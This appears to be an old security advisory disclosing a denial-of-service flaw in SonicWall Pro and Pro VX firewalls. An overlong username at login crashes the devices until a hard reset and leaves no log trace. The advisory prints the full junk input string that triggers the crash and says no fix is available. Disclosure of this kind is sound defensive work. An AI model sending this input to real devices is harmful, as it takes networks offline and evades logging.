COMMAND

    Sonicwall

SYSTEMS AFFECTED

    Sonicwall Pro and Pro VX

PROBLEM

    'digital  llamas'  found  following.   After  reading  a  previous
    issues that  deals with  the sonicwall  soho versions  4.0 and 5.0
    being  vulnerable  to  a  buffer  overflow  by  using  a  alot  of
    characters  in  the  username...he  started  testing  againg   our
    Sonicwall Pro and Pro VX in the lab.

    Entering this for the username:

        092843lb4b2j34lh324jklh321j4h23jh4h32lh4kh23jh4k32l4h1;32uo439028470923874823709479283740872319874872314-072319748-73214y321h4jh32;j4y;239847802134u32h4p923u432ij4iop832u4i32j4kj234jk32j4j2o3ij4;123o4juio23j4io2j314ioj231oij4i23h4ih32;i4hji;o234;io2j34;oijio;23j4;32i4h;i23h4;io3h2i;o4h;o234;io23j4i;o23j4;j32;4j;32j4;j3124;j23;i4j;2o3i4j;231h54;ioh213;o5i23;ioh54;o2i1hi2o345;oij145;oij23;o54;2o31jh45io;2j315;io243j;1i5o32;oh54;io23h145;i2154i1o2j435hi2143h5;h432;5ih143;5jh;4135hj;143j5;i15ji4o;jh1;ih54o;i5jh3o;i5jhio15jhi431h5i;o34h5;ioh4i;o5hi;4oh3;io54h;i4o1h5i;o143h5;io13;o5hj1io;4h5io;14hj5i;o1h;io4h5;oi1h5i;oh1345io;h43;oi5h4i;o1;5iohi;o435h;io134h5;1oj4;io13h;1h4;oi54;io231;io52;oi345;oi234;o51;ioj5r;j134i;o51;iohio4i;o;3o21oi5;io145hi43;oi5;43o5;4o35;34o5;o435;43hj5;o43h5;o435;ioh43oh5;43oi5j;oi4jh5;oij45;oj435;oj435;ioj435;oij435;oij345;oij34;o5ij43;oi5j4;3o5;345jio345oiuj43j5;43oj5;io435oij43oj54;3oj5;oij435;oi435;oi43o;5;io435;io3j45;oj34;5ioj;34oj5;o345j;o34o5j432o5io234;oi5;oi435;o32uj4;5oiu4;oi;uj543u25u4;3o5;i345io;o435io34;5u;54;o2i3u45;i53;3i5u;i4325u2;3u534;25u32;o4iu5;324u5;i32ou5;io245u;342u5;23iou5;43o5iu345;234ou5234;o5iu2;34oi5u23;io5u23;ou45;34oui523;iou34;iou45;23iou4;2oi5u43;5iou243;o5iu32;4oui5;32ou45oi2u435;oi23u4j5;o243j5;o2ju435j345;j43;5;43j53;4jr;ifg;fjkfjklgfjkgfjk;lkj;lgfljklfkjgjkl;gjkl;gjkl;gjklgjklgjksfdjkgfjkl;g;jlgjklgfjkl;gj;lgfj;klgjkl;gjklfjklggklsjk;sk;jlsjkl;gjklfjkl;sl;jkjk;lgjkl;sgjgldljkgdjlk;fjl;gjkl;ldjsjlk;gsjl;kgjlksgjlkgsjlk;d;jlkdjkl;sflsgfjklgskjsgjkl;gslkjgsl;jklsgfdl;gjlfdlgk;jd;slfj;lkgsl;dfg;kjlsdfgkjsfjd;lgjsdjfgjsd';jgkjs;kfdgkjsd;fgj;sdf;jd;sjg;jdfgkjsd;fjgk;sj;sdljfjgk;sfjd;jgsd;fjgjsdgj;sldfj;gj;sdfjgj;sjfdjg;sdfjgjs;dfjg;ksdfjkgjsj;ksl;klj;lfdjgk;jfd;lgdfg

    and using this for the password-

        blah

    The  sonicwalls  pro  and  pro   vx  not  only  stopped   allowing
    communication....but lost everything all together....they did  not
    automatically  reset....they  did  not  automatically stop the log
    in......they were down until we physically reset them.  This is  a
    different issue then the prior reported because it actually  stops
    communication for good until a hard reset.

    Upon a reset, 'digital  llamas' logged back into the box and guess
    what......NO LOGS  AT ALL  PERTAINING TO  THE ATTACK!   This is no
    good...

SOLUTION

    Nothing yet.